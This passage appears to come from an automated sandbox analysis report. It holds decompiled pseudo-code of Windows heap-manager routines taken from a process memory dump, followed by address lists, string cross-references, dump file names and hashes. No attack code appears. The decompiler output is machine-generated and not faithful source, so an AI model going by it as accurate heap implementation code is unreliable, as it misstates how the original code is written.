                                                        								_t269 = _t206 & 0x0000ffff;
                                                        								if(( *(_t333 + 0x40) & 0x00000040) != 0) {
                                                        									E00B789F0( &(_t354[8]), _t269 * 8 - 0x10, 0xfeeefeee);
                                                        									_t354[1] = _t354[1] | 0x00000004;
                                                        								}
                                                        								_t210 =  *(_t333 + 0xb8);
                                                        								__eflags = _t210;
                                                        								if(_t210 == 0) {
                                                        									_t211 =  *(_t333 + 0xc4);
                                                        									goto L41;
                                                        								} else {
                                                        									while(1) {
                                                        										__eflags = _t269 -  *((intOrPtr*)(_t210 + 4));
                                                        										if(_t269 <  *((intOrPtr*)(_t210 + 4))) {
                                                        											break;
                                                        										}
                                                        										_t311 =  *_t210;
                                                        										__eflags = _t311;
                                                        										if(_t311 != 0) {
                                                        											_t210 = _t311;
                                                        											continue;
                                                        										} else {
                                                        											_t298 =  *((intOrPtr*)(_t210 + 4)) - 1;
                                                        											__eflags = _t298;
                                                        											_v24 = _t298;
                                                        											L16:
                                                        											_t276 = _t210 + 0x14;
                                                        											while(1) {
                                                        												_t320 =  *(_t210 + 0x18);
                                                        												_t299 = _t298 -  *_t276;
                                                        												_v12 = _t210;
                                                        												_t218 =  *((intOrPtr*)(_t320 + 4));
                                                        												_v20 = _t320;
                                                        												__eflags = _t320 - _t218;
                                                        												if(_t320 == _t218) {
                                                        													goto L79;
                                                        												}
                                                        												L18:
                                                        												_t321 =  *(_t333 + 0x4c);
                                                        												_v32 = _t321;
                                                        												__eflags = _t321;
                                                        												if(_t321 == 0) {
                                                        													_t220 =  *(_t218 - 8) & 0x0000ffff;
                                                        												} else {
                                                        													_t249 =  *(_t218 - 8);
                                                        													_t330 =  *(_t333 + 0x4c);
                                                        													_v32 = _t330;
                                                        													__eflags = _t249 & _t330;
                                                        													if((_t249 & _t330) != 0) {
                                                        														_t249 = _t249 ^  *(_t333 + 0x50);
                                                        														__eflags = _t249;
                                                        													}
                                                        													_t220 = _t249 & 0x0000ffff;
                                                        												}
                                                        												_t221 = _v8 & 0x0000ffff;
                                                        												_v36 = _t221;
                                                        												__eflags = _t221 - (_t220 & 0x0000ffff);
                                                        												_t223 = _v20;
                                                        												if(_t221 - (_t220 & 0x0000ffff) > 0) {
                                                        													L73:
                                                        													_v16 = _t223;
                                                        													goto L40;
                                                        												} else {
                                                        													_t323 = _v32;
                                                        													_t225 =  *_t223 - 8;
                                                        													__eflags = _t323;
                                                        													if(_t323 == 0) {
                                                        														_t226 =  *_t225 & 0x0000ffff;
                                                        													} else {
                                                        														_t248 =  *_t225;
                                                        														_t323 =  *(_t333 + 0x4c);
                                                        														__eflags = _t248 & _t323;
                                                        														if((_t248 & _t323) != 0) {
                                                        															_t248 = _t248 ^  *(_t333 + 0x50);
                                                        															__eflags = _t248;
                                                        														}
                                                        														_t226 = _t248 & 0x0000ffff;
                                                        													}
                                                        													__eflags = _v36 - (_t226 & 0x0000ffff);
                                                        													if(_v36 - (_t226 & 0x0000ffff) <= 0) {
                                                        														_t223 =  *_v20;
                                                        														goto L73;
                                                        													} else {
                                                        														_t229 = _v12;
                                                        														__eflags =  *_t229;
                                                        														if( *_t229 != 0) {
                                                        															L84:
                                                        															_t230 = _v12;
                                                        															_t348 = _t299 >> 5;
                                                        															_t277 =  *((intOrPtr*)(_t230 + 0x1c)) + _t348 * 4;
                                                        															_t327 = ( *((intOrPtr*)(_t230 + 4)) -  *_t276 >> 5) - 1;
                                                        															_t237 =  !((1 << (_t299 & 0x0000001f)) - 1) &  *_t277;
                                                        															__eflags = 1;
                                                        															if(1 != 0) {
                                                        																L88:
                                                        																__eflags = _t237 & 0x0000ffff;
                                                        																if((_t237 & 0x0000ffff) == 0) {
                                                        																	_t304 = _t237 >> 0x00000010 & 0x000000ff;
                                                        																	__eflags = _t304;
                                                        																	if(_t304 != 0) {
                                                        																		_t163 = _t304 + 0xb537f8; // 0x10008
                                                        																		_t239 = ( *_t163 & 0x000000ff) + 0x10;
                                                        																	} else {
                                                        																		_t162 = (_t237 >> 0x18) + 0xb537f8; // 0x10008
                                                        																		_t239 = ( *_t162 & 0x000000ff) + 0x18;
                                                        																	}
                                                        																} else {
                                                        																	_t329 = _t237 & 0x000000ff;
                                                        																	__eflags = _t329;
                                                        																	if(_t329 == 0) {
                                                        																		_t161 = (_t237 >> 0x00000008 & 0x000000ff) + 0xb537f8; // 0x10008
                                                        																		_t239 = ( *_t161 & 0x000000ff) + 8;
                                                        																	} else {
                                                        																		_t154 = _t329 + 0xb537f8; // 0x10008
                                                        																		_t239 =  *_t154 & 0x000000ff;
                                                        																	}
                                                        																}
                                                        																_t350 = (_t348 << 5) + _t239;
                                                        																_t240 = _v12;
                                                        																__eflags =  *(_t240 + 8);
                                                        																_t305 = _t350 + _t350;
                                                        																if( *(_t240 + 8) == 0) {
                                                        																	_t305 = _t350;
                                                        																}
                                                        																_t223 =  *( *((intOrPtr*)(_t240 + 0x20)) + _t305 * 4);
                                                        																goto L73;
                                                        															} else {
                                                        																goto L85;
                                                        															}
                                                        															while(1) {
                                                        																L85:
                                                        																__eflags = _t348 - _t327;
                                                        																if(_t348 > _t327) {
                                                        																	break;
                                                        																}
                                                        																_t277 =  &(_t277[2]);
                                                        																_t237 =  *_t277;
                                                        																_t348 = _t348 + 1;
                                                        																__eflags = _t237;
                                                        																if(_t237 == 0) {
                                                        																	continue;
                                                        																}
                                                        																break;
                                                        															}
                                                        															__eflags = _t237;
                                                        															if(_t237 == 0) {
                                                        																_v16 = _v16 & 0x00000000;
                                                        																L40:
                                                        																_t211 = _v16;
                                                        																__eflags = _t211;
                                                        																if(_t211 == 0) {
                                                        																	_t210 =  *_v12;
                                                        																	_t333 = _a4;
                                                        																	_t276 = _t210 + 0x14;
                                                        																	_t298 =  *_t276;
                                                        																	_v24 = _t298;
                                                        																	_t320 =  *(_t210 + 0x18);
                                                        																	_t299 = _t298 -  *_t276;
                                                        																	_v12 = _t210;
                                                        																	_t218 =  *((intOrPtr*)(_t320 + 4));
                                                        																	_v20 = _t320;
                                                        																	__eflags = _t320 - _t218;
                                                        																	if(_t320 == _t218) {
                                                        																		goto L79;
                                                        																	}
                                                        																	goto L18;
                                                        																}
                                                        																L41:
                                                        																_t319 = _a4;
                                                        																_t77 = _t319 + 0xc4; // 0xc4
                                                        																__eflags = _t77 - _t211;
                                                        																if(_t77 == _t211) {
                                                        																	L48:
                                                        																	_t286 =  *(_t211 + 4);
                                                        																	_t270 =  *_t286;
                                                        																	_t331 =  &(_t354[4]);
                                                        																	__eflags = _t270 - _t211;
                                                        																	if(__eflags != 0) {
                                                        																		_push(0);
                                                        																		_push(_t270);
                                                        																		_push(0);
                                                        																		_push(_t211);
                                                        																		_push(0);
                                                        																		_push(0xc);
                                                        																		E00BEF840(_t270, 0, _t319, _t331, _t354, __eflags);
                                                        																		_t318 = _a4;
                                                        																	} else {
                                                        																		 *_t331 = _t211;
                                                        																		 *(_t331 + 4) = _t286;
                                                        																		 *_t286 = _t331;
                                                        																		 *(_t211 + 4) = _t331;
                                                        																	}
                                                        																	 *((intOrPtr*)(_t318 + 0x78)) =  *((intOrPtr*)(_t318 + 0x78)) + ( *_t354 & 0x0000ffff);
                                                        																	_t197 =  *(_t318 + 0xb8);
                                                        																	__eflags = _t197;
                                                        																	if(_t197 == 0) {
                                                        																		L66:
                                                        																		if( *(_t318 + 0x4c) != 0) {
                                                        																			_t354[1] = _t354[0] ^ _t354[1] ^  *_t354;
                                                        																			 *_t354 =  *_t354 ^  *(_t318 + 0x50);
                                                        																		}
                                                        																		_t200 = _v8 & 0x0000ffff;
                                                        																		_a12 = _a12 - _t200;
                                                        																		_t266 = _v8 & 0x0000ffff;
                                                        																		_t354 = _t354 + _t200 * 8;
                                                        																		_t201 = _v28;
                                                        																		if(_t354 >=  *((intOrPtr*)(_t201 + 0x28))) {
                                                        																			L71:
                                                        																			return _t201;
                                                        																		} else {
                                                        																			goto L69;
                                                        																		}
                                                        																	} else {
                                                        																		_t291 =  *_t354 & 0x0000ffff;
                                                        																		while(1) {
                                                        																			__eflags = _t291 -  *((intOrPtr*)(_t197 + 4));
                                                        																			if(_t291 <  *((intOrPtr*)(_t197 + 4))) {
                                                        																				break;
                                                        																			}
                                                        																			_t343 =  *_t197;
                                                        																			__eflags = _t343;
                                                        																			if(_t343 != 0) {
                                                        																				_t197 = _t343;
                                                        																				continue;
                                                        																			}
                                                        																			_t291 =  *((intOrPtr*)(_t197 + 4)) - 1;
                                                        																			__eflags = _t291;
                                                        																			break;
                                                        																		}
                                                        																		_v32 = _t291;
                                                        																		_t282 = _t291 -  *((intOrPtr*)(_t197 + 0x14));
                                                        																		__eflags =  *(_t197 + 8);
                                                        																		_v20 = _t282;
                                                        																		_t335 = _t282 + _t282;
                                                        																		if( *(_t197 + 8) == 0) {
                                                        																			_t335 = _t282;
                                                        																		}
                                                        																		 *((intOrPtr*)(_t197 + 0xc)) =  *((intOrPtr*)(_t197 + 0xc)) + 1;
                                                        																		_t336 = _t335 << 2;
                                                        																		_v36 = _t336;
                                                        																		_v24 =  *(_t336 +  *(_t197 + 0x20));
                                                        																		__eflags = _v32 -  *((intOrPtr*)(_t197 + 4)) - 1;
                                                        																		if(_v32 ==  *((intOrPtr*)(_t197 + 4)) - 1) {
                                                        																			_t107 = _t197 + 0x10;
                                                        																			 *_t107 =  *(_t197 + 0x10) + 1;
                                                        																			__eflags =  *_t107;
                                                        																		}
                                                        																		_t340 = _v24;
                                                        																		__eflags = _t340;
                                                        																		if(_t340 == 0) {
                                                        																			L64:
                                                        																			_t331 =  *(_t197 + 0x20);
                                                        																			 *(_v36 +  *(_t197 + 0x20)) =  &(_t354[4]);
                                                        																			_t282 = _v20;
                                                        																			goto L65;
                                                        																		} else {
                                                        																			__eflags =  *(_t318 + 0x4c);
                                                        																			if( *(_t318 + 0x4c) == 0) {
                                                        																				_t341 =  *(_t340 - 8) & 0x0000ffff;
                                                        																			} else {
                                                        																				_t342 =  *(_t340 - 8);
                                                        																				__eflags =  *(_t318 + 0x4c) & _t342;
                                                        																				if(( *(_t318 + 0x4c) & _t342) != 0) {
                                                        																					_t342 = _t342 ^  *(_t318 + 0x50);
                                                        																					__eflags = _t342;
                                                        																				}
                                                        																				_t341 = _t342 & 0x0000ffff;
                                                        																			}
                                                        																			_t331 = _t341 & 0x0000ffff;
                                                        																			__eflags = ( *_t354 & 0x0000ffff) - (_t341 & 0x0000ffff);
                                                        																			if(( *_t354 & 0x0000ffff) - (_t341 & 0x0000ffff) > 0) {
                                                        																				L65:
                                                        																				__eflags = _v24;
                                                        																				if(_v24 == 0) {
                                                        																					 *( *((intOrPtr*)(_t197 + 0x1c)) + (_t282 >> 5) * 4) =  *( *((intOrPtr*)(_t197 + 0x1c)) + (_t282 >> 5) * 4) | 1 << (_t282 & 0x0000001f);
                                                        																					_t318 = _a4;
                                                        																				}
                                                        																				goto L66;
                                                        																			} else {
                                                        																				goto L64;
                                                        																			}
                                                        																		}
                                                        																	}
                                                        																}
                                                        																_t344 =  *(_t319 + 0x4c);
                                                        																while(1) {
                                                        																	__eflags = _t344;
                                                        																	if(_t344 == 0) {
                                                        																		_t294 =  *(_t211 - 8) & 0x0000ffff;
                                                        																	} else {
                                                        																		_t297 =  *(_t211 - 8);
                                                        																		_t344 =  *(_t319 + 0x4c);
                                                        																		__eflags = _t297 & _t344;
                                                        																		if((_t297 & _t344) != 0) {
                                                        																			_t297 = _t297 ^  *(_t319 + 0x50);
                                                        																			__eflags = _t297;
                                                        																		}
                                                        																		_t294 = _t297 & 0x0000ffff;
                                                        																	}
                                                        																	__eflags = (_v8 & 0x0000ffff) - (_t294 & 0x0000ffff);
                                                        																	if((_v8 & 0x0000ffff) <= (_t294 & 0x0000ffff)) {
                                                        																		goto L48;
                                                        																	}
                                                        																	_t211 =  *_t211;
                                                        																	_t189 = _t319 + 0xc4; // 0xc4
                                                        																	__eflags = _t189 - _t211;
                                                        																	if(_t189 == _t211) {
                                                        																		goto L48;
                                                        																	}
                                                        																}
                                                        																goto L48;
                                                        															}
                                                        															goto L88;
                                                        														}
                                                        														__eflags = _v24 - _t229[2] - 1;
                                                        														if(_v24 != _t229[2] - 1) {
                                                        															goto L84;
                                                        														}
                                                        														__eflags = _t229[4];
                                                        														if(_t229[4] != 0) {
                                                        															_t299 = _t299 + _t299;
                                                        															__eflags = _t299;
                                                        														}
                                                        														_t223 =  *(_t229[0x10] + _t299 * 4);
                                                        														__eflags = _v20 - _t223;
                                                        														if(_v20 == _t223) {
                                                        															goto L40;
                                                        														} else {
                                                        															_t353 = _a4;
                                                        															while(1) {
                                                        																__eflags = _t323;
                                                        																if(_t323 == 0) {
                                                        																	_t307 =  *(_t223 - 8) & 0x0000ffff;
                                                        																} else {
                                                        																	_t310 =  *(_t223 - 8);
                                                        																	_t323 =  *(_t353 + 0x4c);
                                                        																	__eflags = _t310 & _t323;
                                                        																	if((_t310 & _t323) != 0) {
                                                        																		_t310 = _t310 ^  *(_t353 + 0x50);
                                                        																		__eflags = _t310;
                                                        																	}
                                                        																	_t307 = _t310 & 0x0000ffff;
                                                        																}
                                                        																__eflags = (_v8 & 0x0000ffff) - (_t307 & 0x0000ffff);
                                                        																if((_v8 & 0x0000ffff) - (_t307 & 0x0000ffff) <= 0) {
                                                        																	goto L73;
                                                        																}
                                                        																_t223 =  *_t223;
                                                        																__eflags = _v20 - _t223;
                                                        																if(_v20 != _t223) {
                                                        																	continue;
                                                        																}
                                                        																goto L40;
                                                        															}
                                                        															goto L73;
                                                        														}
                                                        													}
                                                        												}
                                                        												L79:
                                                        												_v16 = _t320;
                                                        												goto L40;
                                                        											}
                                                        										}
                                                        									}
                                                        									_t298 = _t269;
                                                        									_v24 = _t269;
                                                        									goto L16;
                                                        								}
                                                        							}
                                                        							__eflags = _t268 - 0xfe;
                                                        							if(__eflags >= 0) {
                                                        								goto L113;
                                                        							}
                                                        						}
                                                        						goto L11;
                                                        						L69:
                                                        					} while (_a12 != 0);
                                                        					_t201 =  *(_a4 + 0x54) ^ _v8;
                                                        					_t354[2] = _t201;
                                                        					if(_v8 == 0) {
                                                        						__eflags =  *0xc277b0 - 1;
                                                        						if( *0xc277b0 >= 1) {
                                                        							_t201 =  &(_t354[0x7ff]) & 0xfffff000;
                                                        							__eflags = _t201 - _t354;
                                                        							if(_t201 != _t354) {
                                                        								_t257 =  *( *[fs:0x18] + 0x30);
                                                        								__eflags =  *(_t257 + 0xc);
                                                        								if( *(_t257 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E00B9373B();
                                                        								} else {
                                                        									E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                                        								E00B9373B();
                                                        								_t201 = E00BEF826(_t266, _t318, _t331, _t354, 1);
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L71;
                                                        				}
                                                        			}
                                                        0x00b5745a
                                                        0x00000000
                                                        0x00000000
                                                        0x00b57460
                                                        0x00b57460
                                                        0x00b57463
                                                        0x00b57466
                                                        0x00b57468
                                                        0x00b89eea
                                                        0x00b5746e
                                                        0x00b5746e
                                                        0x00b57471
                                                        0x00b57474
                                                        0x00b57477
                                                        0x00b57479
                                                        0x00b5747b
                                                        0x00b5747b
                                                        0x00b5747b
                                                        0x00b5747e
                                                        0x00b5747e
                                                        0x00b57484
                                                        0x00b57488
                                                        0x00b5748d
                                                        0x00b5748f
                                                        0x00b57492
                                                        0x00b5767b
                                                        0x00b5767b
                                                        0x00000000
                                                        0x00b57498
                                                        0x00b5749a
                                                        0x00b5749d
                                                        0x00b574a0
                                                        0x00b574a2
                                                        0x00b89ef3
                                                        0x00b574a8
                                                        0x00b574a8
                                                        0x00b574aa
                                                        0x00b574ad
                                                        0x00b574af
                                                        0x00b574b1
                                                        0x00b574b1
                                                        0x00b574b1
                                                        0x00b574b4
                                                        0x00b574b4
                                                        0x00b574bf
                                                        0x00b574c1
                                                        0x00b83d2b
                                                        0x00000000
                                                        0x00b574c7
                                                        0x00b574c7
                                                        0x00b574ca
                                                        0x00b574cd
                                                        0x00b89d59
                                                        0x00b89d59
                                                        0x00b89d66
                                                        0x00b89d69
                                                        0x00b89d77
                                                        0x00b89d7b
                                                        0x00b89d7b
                                                        0x00b89d7d
                                                        0x00b89d95
                                                        0x00b89d98
                                                        0x00b89d9a
                                                        0x00b89e78
                                                        0x00b89e78
                                                        0x00b89e7e
                                                        0x00b89e92
                                                        0x00b89e99
                                                        0x00b89e80
                                                        0x00b89e83
                                                        0x00b89e8a
                                                        0x00b89e8a
                                                        0x00b89da0
                                                        0x00b89da7
                                                        0x00b89da7
                                                        0x00b89da9
                                                        0x00b89dd7
                                                        0x00b89dde
                                                        0x00b89dab
                                                        0x00b89dab
                                                        0x00b89dab
                                                        0x00b89dab
                                                        0x00b89da9
                                                        0x00b89db5
                                                        0x00b89db7
                                                        0x00b89dba
                                                        0x00b89dbe
                                                        0x00b89dc1
                                                        0x00b9db13
                                                        0x00b9db13
                                                        0x00b89dca
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89d7f
                                                        0x00b89d7f
                                                        0x00b89d7f
                                                        0x00b89d81
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89d83
                                                        0x00b89d86
                                                        0x00b89d88
                                                        0x00b89d89
                                                        0x00b89d8b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89d8b
                                                        0x00b89d8d
                                                        0x00b89d8f
                                                        0x00b89ecc
                                                        0x00b57526
                                                        0x00b57526
                                                        0x00b57529
                                                        0x00b5752b
                                                        0x00b89ed8
                                                        0x00b89eda
                                                        0x00b89edd
                                                        0x00b89ee0
                                                        0x00b89ee2
                                                        0x00b5744a
                                                        0x00b5744d
                                                        0x00b5744f
                                                        0x00b57452
                                                        0x00b57455
                                                        0x00b57458
                                                        0x00b5745a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b5745a
                                                        0x00b57531
                                                        0x00b57531
                                                        0x00b57534
                                                        0x00b5753a
                                                        0x00b5753c
                                                        0x00b57568
                                                        0x00b57568
                                                        0x00b5756b
                                                        0x00b5756d
                                                        0x00b57570
                                                        0x00b57572
                                                        0x00b9db31
                                                        0x00b9db32
                                                        0x00b9db33
                                                        0x00b9db34
                                                        0x00b9db35
                                                        0x00b9db36
                                                        0x00b9db38
                                                        0x00b9db3d
                                                        0x00b57578
                                                        0x00b57578
                                                        0x00b5757a
                                                        0x00b5757d
                                                        0x00b5757f
                                                        0x00b5757f
                                                        0x00b57585
                                                        0x00b57588
                                                        0x00b5758e
                                                        0x00b57590
                                                        0x00b57624
                                                        0x00b57628
                                                        0x00b57632
                                                        0x00b57638
                                                        0x00b57638
                                                        0x00b5763a
                                                        0x00b5763e
                                                        0x00b57641
                                                        0x00b57645
                                                        0x00b57648
                                                        0x00b5764e
                                                        0x00b57674
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b57596
                                                        0x00b57596
                                                        0x00b57599
                                                        0x00b57599
                                                        0x00b5759c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b5759e
                                                        0x00b575a0
                                                        0x00b575a2
                                                        0x00b5768a
                                                        0x00000000
                                                        0x00b5768a
                                                        0x00b575ab
                                                        0x00b575ab
                                                        0x00000000
                                                        0x00b575ab
                                                        0x00b575ac
                                                        0x00b575af
                                                        0x00b575b2
                                                        0x00b575b6
                                                        0x00b575b9
                                                        0x00b575bc
                                                        0x00b9db45
                                                        0x00b9db45
                                                        0x00b575c2
                                                        0x00b575c8
                                                        0x00b575cb
                                                        0x00b575d1
                                                        0x00b575d8
                                                        0x00b575db
                                                        0x00b575dd
                                                        0x00b575dd
                                                        0x00b575dd
                                                        0x00b575dd
                                                        0x00b575e0
                                                        0x00b575e3
                                                        0x00b575e5
                                                        0x00b5760b
                                                        0x00b5760b
                                                        0x00b57614
                                                        0x00b57617
                                                        0x00000000
                                                        0x00b575e7
                                                        0x00b575e7
                                                        0x00b575eb
                                                        0x00b89f0d
                                                        0x00b575f1
                                                        0x00b575f1
                                                        0x00b575f4
                                                        0x00b575f7
                                                        0x00b575f9
                                                        0x00b575f9
                                                        0x00b575f9
                                                        0x00b575fc
                                                        0x00b575fc
                                                        0x00b57602
                                                        0x00b57607
                                                        0x00b57609
                                                        0x00b5761a
                                                        0x00b5761a
                                                        0x00b5761e
                                                        0x00b54479
                                                        0x00b5447b
                                                        0x00b5447b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b57609
                                                        0x00b575e5
                                                        0x00b57590
                                                        0x00b5753e
                                                        0x00b57541
                                                        0x00b57541
                                                        0x00b57543
                                                        0x00b89f04
                                                        0x00b57549
                                                        0x00b57549
                                                        0x00b5754c
                                                        0x00b5754f
                                                        0x00b57551
                                                        0x00b57553
                                                        0x00b57553
                                                        0x00b57553
                                                        0x00b57556
                                                        0x00b57556
                                                        0x00b57560
                                                        0x00b57562
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9db1a
                                                        0x00b9db1c
                                                        0x00b9db22
                                                        0x00b9db24
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9db2a
                                                        0x00000000
                                                        0x00b57541
                                                        0x00000000
                                                        0x00b89d8f
                                                        0x00b574d7
                                                        0x00b574da
                                                        0x00000000
                                                        0x00000000
                                                        0x00b574e0
                                                        0x00b574e4
                                                        0x00b574e6
                                                        0x00b574e6
                                                        0x00b574e6
                                                        0x00b574eb
                                                        0x00b574ee
                                                        0x00b574f1
                                                        0x00000000
                                                        0x00b574f3
                                                        0x00b574f3
                                                        0x00b574f6
                                                        0x00b574f6
                                                        0x00b574f8
                                                        0x00b89efb
                                                        0x00b574fe
                                                        0x00b574fe
                                                        0x00b57501
                                                        0x00b57504
                                                        0x00b57506
                                                        0x00b57508
                                                        0x00b57508
                                                        0x00b57508
                                                        0x00b5750b
                                                        0x00b5750b
                                                        0x00b57517
                                                        0x00b57519
                                                        0x00000000
                                                        0x00000000
                                                        0x00b5751f
                                                        0x00b57521
                                                        0x00b57524
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b57524
                                                        0x00000000
                                                        0x00b574f6
                                                        0x00b574f1
                                                        0x00b574c1
                                                        0x00b6147c
                                                        0x00b6147c
                                                        0x00000000
                                                        0x00b6147c
                                                        0x00b5744a
                                                        0x00b5743a
                                                        0x00b5ab33
                                                        0x00b5ab35
                                                        0x00000000
                                                        0x00b5ab35
                                                        0x00b57427
                                                        0x00b573f1
                                                        0x00b573f7
                                                        0x00000000
                                                        0x00000000
                                                        0x00b573f7
                                                        0x00000000
                                                        0x00b57650
                                                        0x00b57650
                                                        0x00b57661
                                                        0x00b5766a
                                                        0x00b5766e
                                                        0x00b9db4c
                                                        0x00b9db53
                                                        0x00b9db5f
                                                        0x00b9db64
                                                        0x00b9db66
                                                        0x00b9db72
                                                        0x00b9db75
                                                        0x00b9db79
                                                        0x00b9db9b
                                                        0x00b9dba0
                                                        0x00b9db7b
                                                        0x00b9db93
                                                        0x00b9db98
                                                        0x00b9dba6
                                                        0x00b9dbab
                                                        0x00b9dbb3
                                                        0x00b9dbb3
                                                        0x00b9db66
                                                        0x00b9db53
                                                        0x00000000
                                                        0x00b5766e

                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00B9DAA6, 00B9DB8E
                                                        • HEAP: , xrefs: 00B9DAB3, 00B9DB9B
                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00B9DBA6
                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00B9DABE
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                        • API String ID: 0-1657114761
                                                        • Opcode ID: 74e2702ae975d614a6b594ce7f3fd1ee55618874efe027fc8439c6b8b3e00fb0
                                                        • Instruction ID: d75a8b7ba4ea83c22c0a6d4b81692c322d153c2e6e1a4c231ed444f78c8c76f7
                                                        • Opcode Fuzzy Hash: 74e2702ae975d614a6b594ce7f3fd1ee55618874efe027fc8439c6b8b3e00fb0
                                                        • Instruction Fuzzy Hash: 0C02BA70608606CFCB14CF59D484B79B7F1FF54311F2981E9E8458B2A1EB34E989DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BAA48B
                                                        • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 00BAA4AC
                                                        • HEAP: , xrefs: 00BAA498
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-2419525547
                                                        • Opcode ID: cf4834b9702a87102da1f3c317ec7bdb6db6eea53351c4b7cd0b96421a512511
                                                        • Instruction ID: 53fdfd95a8f9a6bacb1b98e31f3efbf3d552248493936ab451775e94bfafbe64
                                                        • Opcode Fuzzy Hash: cf4834b9702a87102da1f3c317ec7bdb6db6eea53351c4b7cd0b96421a512511
                                                        • Instruction Fuzzy Hash: E5C28971A042128FCB18CF19C494A7A77E2FF99701B29C1E9EC6A9B355D730ED41DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BAACB5
                                                        • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 00BAACD9
                                                        • HEAP: , xrefs: 00BAACC2
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-2419525547
                                                        • Opcode ID: 840cdf82b4806d3d9d68ceaf1587dbd900bd4ea2d7b9df5966e728011eb1d6e5
                                                        • Instruction ID: 12e64884310206e3f66770d12252d4cb6041884e76c063018a533971a353c3d2
                                                        • Opcode Fuzzy Hash: 840cdf82b4806d3d9d68ceaf1587dbd900bd4ea2d7b9df5966e728011eb1d6e5
                                                        • Instruction Fuzzy Hash: 27A29D70904255CFDB29CF64C480BA9BBF1FF49702F1485E9E896AB391D730AD85DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BADC0F
                                                        • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 00BADC30
                                                        • HEAP: , xrefs: 00BADC1C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                                        • API String ID: 0-212623055
                                                        • Opcode ID: 421ea935210868c02782bb01635b0c671afefac10f6d61824712c346d06b7dd5
                                                        • Instruction ID: b448e4caeaea23db760670b5ceb70194d9419954411b672e0c8e95a03a57c801
                                                        • Opcode Fuzzy Hash: 421ea935210868c02782bb01635b0c671afefac10f6d61824712c346d06b7dd5
                                                        • Instruction Fuzzy Hash: FC72FE709042599FDB25CFA8C881BBDBBF1FF09311F1480D9E896AB691D334A949DF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
